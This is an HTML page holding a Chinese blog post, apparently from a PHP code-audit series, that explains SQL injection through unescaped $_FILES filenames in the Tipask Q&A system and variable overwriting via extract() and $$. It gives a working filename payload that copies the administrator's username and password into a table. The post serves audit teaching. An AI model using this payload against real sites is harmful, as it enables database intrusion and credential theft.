<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"/>





  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  




<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="PHP,SQL注入,代码审计," />





  <link rel="alternate" href="http://www.cnbraid.com/atom.xml" title="Braid's Blog - 阅尽天下代码，心中自然无码" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="0x01 背景现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，接上篇http://www.cnbraid.com/2016/04/29/sql5/，这里介绍另外两种情况。盲点如下：①FILES注入，全局只转义掉GET、POST等传来的参数，遗漏了FILES；②变量覆盖，危险函数：extra">
<meta property="og:type" content="article">
<meta property="og:title" content="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结下篇">
<meta property="og:url" content="http://www.cnbraid.com/2016/05/10/sql6/index.html">
<meta property="og:site_name" content="Braid's Blog - 阅尽天下代码，心中自然无码">
<meta property="og:description" content="0x01 背景现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，接上篇http://www.cnbraid.com/2016/04/29/sql5/，这里介绍另外两种情况。盲点如下：①FILES注入，全局只转义掉GET、POST等传来的参数，遗漏了FILES；②变量覆盖，危险函数：extra">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql6_01.jpg">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql6_02.jpg">
<meta property="og:image" content="http://7xk8bu.com1.z0.glb.clouddn.com/sql6_03.jpg">
<meta property="og:updated_time" content="2016-05-27T08:40:42.118Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结下篇">
<meta name="twitter:description" content="0x01 背景现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，接上篇http://www.cnbraid.com/2016/04/29/sql5/，这里介绍另外两种情况。盲点如下：①FILES注入，全局只转义掉GET、POST等传来的参数，遗漏了FILES；②变量覆盖，危险函数：extra">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结下篇 | Braid's Blog - 阅尽天下代码，心中自然无码 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Braid's Blog - 阅尽天下代码，心中自然无码</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">攻城狮，黑客，网络安全爱好者</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-home fa-fw"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-th fa-fw"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-archive fa-fw"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-tags fa-fw"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-user fa-fw"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结下篇
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-05-10T10:35:00+08:00" content="2016-05-10">
              2016-05-10
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/WEB安全/" itemprop="url" rel="index">
                    <span itemprop="name">WEB安全</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/05/10/sql6/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/05/10/sql6/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          
             <span id="/2016/05/10/sql6/" class="leancloud_visitors" data-flag-title="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结下篇">
               &nbsp; | &nbsp;
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               <span class="post-meta-item-text">阅读次数 </span>
               <span class="leancloud-visitors-count"></span>
              </span>
          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x01_背景">0x01 背景</h2><p>现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，接上篇<a href="http://www.cnbraid.com/2016/04/29/sql5/">http://www.cnbraid.com/2016/04/29/sql5/</a>，这里介绍另外两种情况。<br><strong>盲点如下：</strong><br>①FILES注入，全局只转义掉GET、POST等传来的参数，遗漏了FILES；<br>②变量覆盖，危险函数：extract()、parse_str()、$$。<br><a id="more"></a></p>
<h2 id="0x02_漏洞分析">0x02 漏洞分析</h2><h3 id="FILES注入">FILES注入</h3><p>FILES注入一般情况是是因为上传时把上传的名字带到insert入库产生的，这里看下tipask问答系统<br>首先看看它的全局防护是怎么处理的：<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">index.php里:</span><br><span class="line"><span class="keyword">include</span> TIPASK_ROOT . <span class="string">'/model/tipask.class.php'</span>;</span><br><span class="line"><span class="variable">$tipask</span> = <span class="keyword">new</span> tipask();</span><br><span class="line"><span class="variable">$tipask</span>-&gt;run();</span><br><span class="line">... ...</span><br><span class="line">跟进到/model/tipask.class.php里:</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">init_request</span><span class="params">()</span> </span>&#123;</span><br><span class="line">... ...</span><br><span class="line">        <span class="variable">$this</span>-&gt;get = taddslashes(<span class="variable">$this</span>-&gt;get, <span class="number">1</span>);</span><br><span class="line">        <span class="variable">$this</span>-&gt;post = taddslashes(array_merge(<span class="variable">$_GET</span>, <span class="variable">$_POST</span>));</span><br><span class="line">        checkattack(<span class="variable">$this</span>-&gt;post, <span class="string">'post'</span>);</span><br><span class="line">        checkattack(<span class="variable">$this</span>-&gt;get, <span class="string">'get'</span>);</span><br><span class="line">        <span class="keyword">unset</span>(<span class="variable">$_POST</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到对get和post传来的数据进行了addslashes特殊转义处理，对$_FILES没有任何处理操作，我们全局搜索$_FILES，发现/control/attach.php有上传处理，我们跟进：<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="preprocessor">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">onupload</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="comment">//上传配置</span></span><br><span class="line">	<span class="variable">$config</span> = <span class="keyword">array</span>(</span><br><span class="line">		<span class="string">"uploadPath"</span> =&gt; <span class="string">"data/attach/"</span>, <span class="comment">//保存路径</span></span><br><span class="line">		<span class="string">"fileType"</span> =&gt; <span class="keyword">array</span>(<span class="string">".rar"</span>, <span class="string">".doc"</span>, <span class="string">".docx"</span>, <span class="string">".zip"</span>, <span class="string">".pdf"</span>, <span class="string">".txt"</span>, <span class="string">".swf"</span>, <span class="string">".wmv"</span>, <span class="string">"xsl"</span>), <span class="comment">//文件允许格式</span></span><br><span class="line">		<span class="string">"fileSize"</span> =&gt; <span class="number">10</span> <span class="comment">//文件大小限制，单位MB</span></span><br><span class="line">	);</span><br><span class="line"></span><br><span class="line">	<span class="comment">//文件上传状态,当成功时返回SUCCESS，其余值将直接返回对应字符窜</span></span><br><span class="line">	<span class="variable">$state</span> = <span class="string">"SUCCESS"</span>;</span><br><span class="line">	<span class="variable">$clientFile</span> = <span class="variable">$_FILES</span>[<span class="string">"upfile"</span>];</span><br><span class="line">	<span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$clientFile</span>)) &#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">"&#123;'state':'文件大小超出服务器配置！','url':'null','fileType':'null'&#125;"</span>; <span class="comment">//请修改php.ini中的upload_max_filesize和post_max_size</span></span><br><span class="line">		<span class="keyword">exit</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">//格式验证</span></span><br><span class="line">	<span class="variable">$current_type</span> = strtolower(strrchr(<span class="variable">$clientFile</span>[<span class="string">"name"</span>], <span class="string">'.'</span>));</span><br><span class="line">	<span class="keyword">if</span> (!in_array(<span class="variable">$current_type</span>, <span class="variable">$config</span>[<span class="string">'fileType'</span>])) &#123;</span><br><span class="line">		<span class="variable">$state</span> = <span class="string">"不支持的文件类型！"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//大小验证</span></span><br><span class="line">	<span class="variable">$file_size</span> = <span class="number">1024</span> * <span class="number">1024</span> * <span class="variable">$config</span>[<span class="string">'fileSize'</span>];</span><br><span class="line">	<span class="keyword">if</span> (<span class="variable">$clientFile</span>[<span class="string">"size"</span>] &gt; <span class="variable">$file_size</span>) &#123;</span><br><span class="line">		<span class="variable">$state</span> = <span class="string">"文件大小超出限制！"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">//保存文件</span></span><br><span class="line">	<span class="keyword">if</span> (<span class="variable">$state</span> == <span class="string">"SUCCESS"</span>) &#123;</span><br><span class="line">		<span class="variable">$targetfile</span> = <span class="variable">$config</span>[<span class="string">'uploadPath'</span>] . gmdate(<span class="string">'ym'</span>, <span class="variable">$this</span>-&gt;time) . <span class="string">'/'</span> . random(<span class="number">8</span>) . strrchr(<span class="variable">$clientFile</span>[<span class="string">"name"</span>], <span class="string">'.'</span>);</span><br><span class="line">		<span class="variable">$result</span> = <span class="variable">$_ENV</span>[<span class="string">'attach'</span>]-&gt;movetmpfile(<span class="variable">$clientFile</span>, <span class="variable">$targetfile</span>);</span><br><span class="line">		<span class="keyword">if</span> (!<span class="variable">$result</span>) &#123;</span><br><span class="line">			<span class="variable">$state</span> = <span class="string">"文件保存失败！"</span>;</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="comment">//这里将上传的文件名带入数据库查询</span></span><br><span class="line">			<span class="variable">$_ENV</span>[<span class="string">'attach'</span>]-&gt;add(<span class="variable">$clientFile</span>[<span class="string">"name"</span>], <span class="variable">$current_type</span>, <span class="variable">$clientFile</span>[<span class="string">"size"</span>], <span class="variable">$targetfile</span>, <span class="number">0</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">    <span class="comment">//向浏览器返回数据json数据</span></span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&#123;"state":"'</span> . <span class="variable">$state</span> . <span class="string">'","url":"'</span> . <span class="variable">$targetfile</span> . <span class="string">'","fileType":"'</span> . <span class="variable">$current_type</span> . <span class="string">'","original":"'</span> . <span class="variable">$clientFile</span>[<span class="string">"name"</span>] . <span class="string">'"&#125;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到这句$_ENV[‘attach’]-&gt;add($clientFile[“name”]…)，将$clientFile[name] = $_FILES[“upfile”][name]带入了如下add入库的操作，从而造成注入。<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="preprocessor">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">add</span><span class="params">(<span class="variable">$filename</span>,<span class="variable">$ftype</span>,<span class="variable">$fsize</span>,<span class="variable">$location</span>,<span class="variable">$isimage</span>=<span class="number">1</span>)</span> </span>&#123;</span><br><span class="line">	<span class="variable">$uid</span>=<span class="variable">$this</span>-&gt;base-&gt;user[<span class="string">'uid'</span>];</span><br><span class="line">	<span class="variable">$this</span>-&gt;db-&gt;query(<span class="string">"INSERT INTO "</span>.DB_TABLEPRE.<span class="string">"attach(time,filename,filetype,filesize,location,isimage,uid)  VALUES (&#123;$this-&gt;base-&gt;time&#125;,'$filename','$ftype','$fsize','$location',$isimage,$uid)"</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="variable">$this</span>-&gt;db-&gt;insert_id();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>上传一个文件，然后修改文件名称为以下代码即可获取管理员账户密码：</p>
<pre><code>filename="1','.php',1,(<span class="operator">select <span class="keyword">concat</span>(username,<span class="number">0x23</span>,<span class="keyword">password</span>) <span class="keyword">from</span> ask_user <span class="keyword">limit</span> <span class="number">1</span>),<span class="number">2</span>,<span class="number">1</span>)#.jpg<span class="string">"</span></span>
</code></pre><p>数据库里成功将管理员账户密码插入到attach表中：<br><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql6_01.jpg" alt=""></p>
<h3 id="变量覆盖">变量覆盖</h3><p>出现比较多的是<strong>extract函数</strong>，例如extract($_POST)会直接从POST数组中取出变量，覆盖掉之前的一些变量。<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="preprocessor">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span>=<span class="number">222333</span>;</span><br><span class="line">@extract(<span class="variable">$_POST</span>);</span><br><span class="line">print_r(<span class="variable">$a</span>);</span><br></pre></td></tr></table></figure></p>
<p>浏览器里post直接传a=1发现成功覆盖了变量a的值<br><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql6_02.jpg" alt=""><br>目前看乌云的案例<a href="http://www.wooyun.org/bugs/wooyun-2014-053189" target="_blank" rel="external">http://www.wooyun.org/bugs/wooyun-2014-053189</a>是出现在覆盖表前缀上。<br><strong>$$变量覆盖</strong><br>原理其实跟上面一样，有个很经典的$$变量覆盖的代码：<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="preprocessor">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span>=<span class="number">22333</span>;</span><br><span class="line"><span class="keyword">foreach</span>(<span class="keyword">array</span>(<span class="string">'_COOKIE'</span>,<span class="string">'_POST'</span>,<span class="string">'_GET'</span>) <span class="keyword">as</span> <span class="variable">$_request</span>)&#123;</span><br><span class="line">	<span class="keyword">foreach</span>(<span class="variable">$$_request</span> <span class="keyword">as</span> <span class="variable">$_key</span>=&gt;<span class="variable">$_value</span>)&#123;</span><br><span class="line">		<span class="variable">$$_key</span> = addslashes(<span class="variable">$_value</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>;</span><br></pre></td></tr></table></figure></p>
<p>测试发现成功覆盖了变量a<br><img src="http://7xk8bu.com1.z0.glb.clouddn.com/sql6_03.jpg" alt=""><br>案例：<a href="http://www.wooyun.org/bugs/wooyun-2010-055338" target="_blank" rel="external">http://www.wooyun.org/bugs/wooyun-2010-055338</a></p>
<p>本文由HackBraid整理总结，原文链接：<a href="http://www.cnbraid.com/2016/05/10/sql6/">http://www.cnbraid.com/2016/05/10/sql6/</a>，如需转载请联系作者。</p>

      
    </div>

    <div>
      
        
      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PHP/" rel="tag">#PHP</a>
          
            <a href="/tags/SQL注入/" rel="tag">#SQL注入</a>
          
            <a href="/tags/代码审计/" rel="tag">#代码审计</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/04/29/sql5/" rel="next" title="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结上篇">
                <i class="fa fa-chevron-left"></i> 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结上篇
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/05/26/sqltmp/" rel="prev" title="代码审计的艺术">
                代码审计的艺术 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/05/10/sql6/"
           data-title="【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结下篇" data-url="http://www.cnbraid.com/2016/05/10/sql6/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/avatar.jpg"
               alt="Braid" />
          <p class="site-author-name" itemprop="name">Braid</p>
          <p class="site-description motion-element" itemprop="description">web | security | java | php | python</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">14</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="http://www.cnbraid.com/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        <div class="links-of-blogroll motion-element">
          
            <div class="links-of-blogroll-title">友情链接</div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://tnt1200.github.io/" target="_blank">Tnt1200</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.iswin.org/" target="_blank">随风</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://bksec.net/" target="_blank">my5t3ry</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://mars.run/" target="_blank">Mars</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.thinkings.org/" target="_blank">从容</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.waitalone.cn/" target="_blank">独自等待</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.hacksb.org/" target="_blank">断笔抚琴</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.arpida.com/" target="_blank">ArpIda</a>
                </li>
              
            </ul>
          
        </div>

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01_背景"><span class="nav-number">1.</span> <span class="nav-text">0x01 背景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02_漏洞分析"><span class="nav-number">2.</span> <span class="nav-text">0x02 漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#FILES注入"><span class="nav-number">2.1.</span> <span class="nav-text">FILES注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#变量覆盖"><span class="nav-number">2.2.</span> <span class="nav-text">变量覆盖</span></a></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Braid信息安全博客</span>
</div>

<div class="theme-info">
  联系方式：<a class="theme-link" href="mailto:hackbraid@gmail.com">
    hackbraid@gmail.com
  </a></span>
</div>



      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  


  




<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.min.js"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js"></script>

  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/vendors/jquery-scrollintoview/jquery.scrollintoview.min.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"hackbraid"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
  





  
  
  

  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("4mIc01CuAcxNeBtS9VMXLgeW-gzGzoHsz", "gJXfNgx0s7OHWVgJrY5WVs7Y");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

</body>
</html>
